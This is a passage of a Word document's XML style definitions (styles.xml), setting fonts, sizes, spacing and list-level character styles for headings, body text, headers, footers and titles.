    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:suppressAutoHyphens w:val="true"/>
      </w:pPr>
    </w:pPrDefault>
  </w:docDefaults>
  <w:style w:type="paragraph" w:styleId="Normal">
    <w:name w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="false"/>
      <w:keepLines w:val="false"/>
      <w:pageBreakBefore w:val="false"/>
      <w:widowControl/>
      <w:shd w:val="clear" w:fill="auto"/>
      <w:suppressAutoHyphens w:val="false"/>
      <w:overflowPunct w:val="false"/>
      <w:bidi w:val="0"/>
      <w:snapToGrid w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:jc w:val="start"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Arial Unicode MS" w:cs="Times New Roman"/>
      <w:b w:val="false"/>
      <w:bCs w:val="false"/>
      <w:i w:val="false"/>
      <w:iCs w:val="false"/>
      <w:caps w:val="false"/>
      <w:smallCaps w:val="false"/>
      <w:strike w:val="false"/>
      <w:dstrike w:val="false"/>
      <w:outline w:val="false"/>
      <w:emboss w:val="false"/>
      <w:imprint w:val="false"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:kern w:val="0"/>
      <w:position w:val="0"/>
      <w:sz w:val="24"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:u w:val="none"/>
      <w:shd w:fill="auto" w:val="clear"/>
      <w:vertAlign w:val="baseline"/>
      <w:em w:val="none"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:suppressAutoHyphens w:val="false"/>
      <w:spacing w:before="113" w:after="57"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Cambria" w:cs="Cambria"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:next w:val="BodyA"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:pageBreakBefore w:val="false"/>
      <w:widowControl/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:shd w:val="clear" w:fill="auto"/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:overflowPunct w:val="false"/>
      <w:bidi w:val="0"/>
      <w:snapToGrid w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="113" w:after="57"/>
      <w:jc w:val="start"/>
      <w:textAlignment w:val="baseline"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Cambria" w:cs="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:i w:val="false"/>
      <w:iCs w:val="false"/>
      <w:caps w:val="false"/>
      <w:smallCaps w:val="false"/>
      <w:strike w:val="false"/>
      <w:dstrike w:val="false"/>
      <w:outline w:val="false"/>
      <w:emboss w:val="false"/>
      <w:imprint w:val="false"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:kern w:val="0"/>
      <w:position w:val="0"/>
      <w:sz w:val="28"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:u w:val="none"/>
      <w:shd w:fill="auto" w:val="clear"/>
      <w:vertAlign w:val="baseline"/>
      <w:em w:val="none"/>
      <w:lang w:val="en-ZA" w:eastAsia="en-ZA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:suppressAutoHyphens w:val="false"/>
      <w:spacing w:before="113" w:after="57"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Cambria" w:cs="Cambria"/>
      <w:b/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:suppressAutoHyphens w:val="false"/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="365F91"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="DefaultParagraphFont">
    <w:name w:val="Default Paragraph Font"/>
    <w:qFormat/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:rPr>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="NoneA">
    <w:name w:val="None A"/>
    <w:qFormat/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="None">
    <w:name w:val="None"/>
    <w:qFormat/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink0">
    <w:name w:val="Hyperlink.0"/>
    <w:basedOn w:val="None"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single" w:color="0000FF"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Cambria" w:cs="Cambria"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Cambria" w:cs="Cambria"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="365F91"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:fill="E6E6E6" w:val="clear"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IndexLink">
    <w:name w:val="Index Link"/>
    <w:qFormat/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink1">
    <w:name w:val="Hyperlink1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0563C1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="WWCharLFO4LVL1">
    <w:name w:val="WW_CharLFO4LVL1"/>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2">
    <w:name w:val="WW_CharLFO4LVL2"/>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3">
    <w:name w:val="WW_CharLFO4LVL3"/>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4">
    <w:name w:val="WW_CharLFO4LVL4"/>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5">
    <w:name w:val="WW_CharLFO4LVL5"/>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6">
    <w:name w:val="WW_CharLFO4LVL6"/>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7">
    <w:name w:val="WW_CharLFO4LVL7"/>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8">
    <w:name w:val="WW_CharLFO4LVL8"/>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4LVL9">
    <w:name w:val="WW_CharLFO4LVL9"/>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1">
    <w:name w:val="WW_CharLFO5LVL1"/>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2">
    <w:name w:val="WW_CharLFO5LVL2"/>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3">
    <w:name w:val="WW_CharLFO5LVL3"/>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4">
    <w:name w:val="WW_CharLFO5LVL4"/>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5">
    <w:name w:val="WW_CharLFO5LVL5"/>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6">
    <w:name w:val="WW_CharLFO5LVL6"/>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7">
    <w:name w:val="WW_CharLFO5LVL7"/>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8">
    <w:name w:val="WW_CharLFO5LVL8"/>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5LVL9">
    <w:name w:val="WW_CharLFO5LVL9"/>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1">
    <w:name w:val="WW_CharLFO6LVL1"/>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2">
    <w:name w:val="WW_CharLFO6LVL2"/>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3">
    <w:name w:val="WW_CharLFO6LVL3"/>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4">
    <w:name w:val="WW_CharLFO6LVL4"/>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5">
    <w:name w:val="WW_CharLFO6LVL5"/>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6">
    <w:name w:val="WW_CharLFO6LVL6"/>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7">
    <w:name w:val="WW_CharLFO6LVL7"/>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8">
    <w:name w:val="WW_CharLFO6LVL8"/>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6LVL9">
    <w:name w:val="WW_CharLFO6LVL9"/>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1">
    <w:name w:val="WW_CharLFO7LVL1"/>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2">
    <w:name w:val="WW_CharLFO7LVL2"/>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3">
    <w:name w:val="WW_CharLFO7LVL3"/>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4">
    <w:name w:val="WW_CharLFO7LVL4"/>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5">
    <w:name w:val="WW_CharLFO7LVL5"/>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6">
    <w:name w:val="WW_CharLFO7LVL6"/>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7">
    <w:name w:val="WW_CharLFO7LVL7"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>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8">
    <w:name w:val="WW_CharLFO7LVL8"/>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7LVL9">
    <w:name w:val="WW_CharLFO7LVL9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
      <w:b w:val="false"/>
      <w:bCs w:val="false"/>
      <w:i w:val="false"/>
      <w:iCs w:val="false"/>
      <w:caps w:val="false"/>
      <w:smallCaps w:val="false"/>
      <w:strike w:val="false"/>
      <w:dstrike w:val="false"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:kern w:val="0"/>
      <w:position w:val="0"/>
      <w:sz w:val="20"/>
      <w:sz w:val="20"/>
      <w:vertAlign w:val="baseline"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="WWCharLFO8LVL1">
    <w:name w:val="WW_CharLFO8LVL1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="WWCharLFO8LVL2">
    <w:name w:val="WW_CharLFO8LVL2"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="WWCharLFO8LVL3">
    <w:name w:val="WW_CharLFO8LVL3"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="WWCharLFO8LVL4">
    <w:name w:val="WW_CharLFO8LVL4"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="WWCharLFO8LVL5">
    <w:name w:val="WW_CharLFO8LVL5"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="WWCharLFO8LVL6">
    <w:name w:val="WW_CharLFO8LVL6"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="WWCharLFO8LVL7">
    <w:name w:val="WW_CharLFO8LVL7"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="WWCharLFO8LVL8">
    <w:name w:val="WW_CharLFO8LVL8"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="WWCharLFO8LVL9">
    <w:name w:val="WW_CharLFO8LVL9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading">
    <w:name w:val="Heading"/>
    <w:next w:val="BodyA"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:pageBreakBefore w:val="false"/>
      <w:widowControl/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:shd w:val="clear" w:fill="auto"/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:overflowPunct w:val="false"/>
      <w:bidi w:val="0"/>
      <w:snapToGrid w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="360" w:before="480" w:after="240"/>
      <w:jc w:val="start"/>
      <w:textAlignment w:val="baseline"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:i w:val="false"/>
      <w:iCs w:val="false"/>
      <w:caps w:val="false"/>
      <w:smallCaps w:val="false"/>
      <w:strike w:val="false"/>
      <w:dstrike w:val="false"/>
      <w:outline w:val="false"/>
      <w:emboss w:val="false"/>
      <w:imprint w:val="false"/>
      <w:color w:val="0F253F"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:kern w:val="0"/>
      <w:position w:val="0"/>
      <w:sz w:val="32"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:u w:val="none"/>
      <w:shd w:fill="auto" w:val="clear"/>
      <w:vertAlign w:val="baseline"/>
      <w:em w:val="none"/>
      <w:lang w:val="en-US" w:eastAsia="en-ZA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:pPr>
      <w:keepNext w:val="false"/>
      <w:keepLines w:val="false"/>
      <w:pageBreakBefore w:val="false"/>
      <w:widowControl w:val="false"/>
      <w:shd w:val="clear" w:fill="auto"/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:overflowPunct w:val="false"/>
      <w:bidi w:val="0"/>
      <w:snapToGrid w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="120"/>
      <w:jc w:val="start"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="DejaVu Serif" w:hAnsi="DejaVu Serif" w:eastAsia="DejaVu Serif" w:cs="DejaVu Serif"/>
      <w:b w:val="false"/>
      <w:bCs w:val="false"/>
      <w:i w:val="false"/>
      <w:iCs w:val="false"/>
      <w:caps w:val="false"/>
      <w:smallCaps w:val="false"/>
      <w:strike w:val="false"/>
      <w:dstrike w:val="false"/>
      <w:outline w:val="false"/>
      <w:emboss w:val="false"/>
      <w:imprint w:val="false"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:kern w:val="0"/>
      <w:position w:val="0"/>
      <w:sz w:val="24"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:u w:val="none"/>
      <w:shd w:fill="auto" w:val="clear"/>
      <w:vertAlign w:val="baseline"/>
      <w:em w:val="none"/>
      <w:lang w:val="en-US" w:eastAsia="en-ZA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List">
    <w:name w:val="List"/>
    <w:basedOn w:val="BodyText"/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="true"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial Unicode MS"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="Caption"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens w:val="false"/>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial Unicode MS"/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index">
    <w:name w:val="Index"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens w:val="false"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial Unicode MS"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Normal1">
    <w:name w:val="Normal1"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="false"/>
      <w:keepLines w:val="false"/>
      <w:pageBreakBefore w:val="false"/>
      <w:widowControl w:val="false"/>
      <w:shd w:val="clear" w:fill="auto"/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:overflowPunct w:val="false"/>
      <w:bidi w:val="0"/>
      <w:snapToGrid w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:jc w:val="start"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial Unicode MS" w:cs="Times New Roman"/>
      <w:b w:val="false"/>
      <w:bCs w:val="false"/>
      <w:i w:val="false"/>
      <w:iCs w:val="false"/>
      <w:caps w:val="false"/>
      <w:smallCaps w:val="false"/>
      <w:strike w:val="false"/>
      <w:dstrike w:val="false"/>
      <w:outline w:val="false"/>
      <w:emboss w:val="false"/>
      <w:imprint w:val="false"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:kern w:val="0"/>
      <w:position w:val="0"/>
      <w:sz w:val="20"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:u w:val="none"/>
      <w:shd w:fill="auto" w:val="clear"/>
      <w:vertAlign w:val="baseline"/>
      <w:em w:val="none"/>
      <w:lang w:val="en-ZA" w:eastAsia="en-ZA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HeaderandFooter">
    <w:name w:val="Header and Footer"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="false"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="Header"/>
    <w:pPr>
      <w:keepNext w:val="false"/>
      <w:keepLines w:val="false"/>
      <w:pageBreakBefore w:val="false"/>
      <w:widowControl/>
      <w:shd w:val="clear" w:fill="auto"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="center" w:pos="4680" w:leader="none"/>
        <w:tab w:val="right" w:pos="9360" w:leader="none"/>
      </w:tabs>
      <w:suppressAutoHyphens w:val="true"/>
      <w:overflowPunct w:val="false"/>
      <w:bidi w:val="0"/>
      <w:snapToGrid w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="200"/>
      <w:jc w:val="start"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
      <w:b w:val="false"/>
      <w:bCs w:val="false"/>
      <w:i w:val="false"/>
      <w:iCs w:val="false"/>
      <w:caps w:val="false"/>
      <w:smallCaps w:val="false"/>
      <w:strike w:val="false"/>
      <w:dstrike w:val="false"/>
      <w:outline w:val="false"/>
      <w:emboss w:val="false"/>
      <w:imprint w:val="false"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:kern w:val="0"/>
      <w:position w:val="0"/>
      <w:sz w:val="22"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:u w:val="none"/>
      <w:shd w:fill="auto" w:val="clear"/>
      <w:vertAlign w:val="baseline"/>
      <w:em w:val="none"/>
      <w:lang w:val="en-US" w:eastAsia="en-ZA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="Footer"/>
    <w:pPr>
      <w:keepNext w:val="false"/>
      <w:keepLines w:val="false"/>
      <w:pageBreakBefore w:val="false"/>
      <w:widowControl/>
      <w:shd w:val="clear" w:fill="auto"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="center" w:pos="4680" w:leader="none"/>
        <w:tab w:val="right" w:pos="9360" w:leader="none"/>
      </w:tabs>
      <w:suppressAutoHyphens w:val="true"/>
      <w:overflowPunct w:val="false"/>
      <w:bidi w:val="0"/>
      <w:snapToGrid w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="200"/>
      <w:jc w:val="start"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
      <w:b w:val="false"/>
      <w:bCs w:val="false"/>
      <w:i w:val="false"/>
      <w:iCs w:val="false"/>
      <w:caps w:val="false"/>
      <w:smallCaps w:val="false"/>
      <w:strike w:val="false"/>
      <w:dstrike w:val="false"/>
      <w:outline w:val="false"/>
      <w:emboss w:val="false"/>
      <w:imprint w:val="false"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:kern w:val="0"/>
      <w:position w:val="0"/>
      <w:sz w:val="22"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:u w:val="none"/>
      <w:shd w:fill="auto" w:val="clear"/>
      <w:vertAlign w:val="baseline"/>
      <w:em w:val="none"/>
      <w:lang w:val="en-US" w:eastAsia="en-ZA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:next w:val="BodyA"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="false"/>
      <w:keepLines w:val="false"/>
      <w:pageBreakBefore w:val="false"/>
      <w:widowControl/>
      <w:shd w:val="clear" w:fill="auto"/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:overflowPunct w:val="false"/>
      <w:bidi w:val="0"/>
      <w:snapToGrid w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:contextualSpacing/>
      <w:jc w:val="start"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
      <w:b w:val="false"/>
      <w:bCs w:val="false"/>
      <w:i w:val="false"/>
      <w:iCs w:val="false"/>
      <w:caps w:val="false"/>
      <w:smallCaps w:val="false"/>
      <w:strike w:val="false"/>
      <w:dstrike w:val="false"/>
      <w:outline w:val="false"/>
      <w:emboss w:val="false"/>
      <w:imprint w:val="false"/>
      <w:color w:val="17365D"/>
      <w:spacing w:val="5"/>
      <w:w w:val="100"/>
      <w:kern w:val="2"/>
      <w:position w:val="0"/>
      <w:sz w:val="52"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
      <w:u w:val="none"/>
      <w:shd w:fill="auto" w:val="clear"/>
      <w:vertAlign w:val="baseline"/>
      <w:em w:val="none"/>
      <w:lang w:val="en-US" w:eastAsia="en-ZA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="BodyText"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:suppressAutoHyphens w:val="true"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyA">
    <w:name w:val="Body A"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="false"/>
      <w:keepLines w:val="false"/>
      <w:pageBreakBefore w:val="false"/>
      <w:widowControl/>
      <w:shd w:val="clear" w:fill="auto"/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:overflowPunct w:val="false"/>
      <w:bidi w:val="0"/>
      <w:snapToGrid w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="200"/>
      <w:jc w:val="start"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
      <w:b w:val="false"/>
      <w:bCs w:val="false"/>
      <w:i w:val="false"/>
      <w:iCs w:val="false"/>
      <w:caps w:val="false"/>
      <w:smallCaps w:val="false"/>
      <w:strike w:val="false"/>
      <w:dstrike w:val="false"/>
      <w:outline w:val="false"/>
      <w:emboss w:val="false"/>
      <w:imprint w:val="false"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:kern w:val="0"/>
      <w:position w:val="0"/>
      <w:sz w:val="22"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:u w:val="none"/>
      <w:shd w:fill="auto" w:val="clear"/>
      <w:vertAlign w:val="baseline"/>
      <w:em w:val="none"/>
      <w:lang w:val="en-US" w:eastAsia="en-ZA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IndexHeading">
    <w:name w:val="Index Heading"/>
    <w:basedOn w:val="Heading"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:suppressAutoHyphens w:val="true"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:next w:val="BodyA"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:pageBreakBefore w:val="false"/>
      <w:widowControl/>
      <w:shd w:val="clear" w:fill="auto"/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:overflowPunct w:val="false"/>
      <w:bidi w:val="0"/>
      <w:snapToGrid w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="360" w:before="480" w:after="240"/>
      <w:jc w:val="start"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:i w:val="false"/>
      <w:iCs w:val="false"/>
      <w:caps w:val="false"/>
      <w:smallCaps w:val="false"/>
      <w:strike w:val="false"/>
      <w:dstrike w:val="false"/>
      <w:outline w:val="false"/>
      <w:emboss w:val="false"/>
      <w:imprint w:val="false"/>
      <w:color w:val="0F253F"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:kern w:val="0"/>
      <w:position w:val="0"/>
      <w:sz w:val="32"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:u w:val="none"/>
      <w:shd w:fill="auto" w:val="clear"/>
      <w:vertAlign w:val="baseline"/>
      <w:em w:val="none"/>
      <w:lang w:val="en-US" w:eastAsia="en-ZA" w:bidi="ar-SA"/>
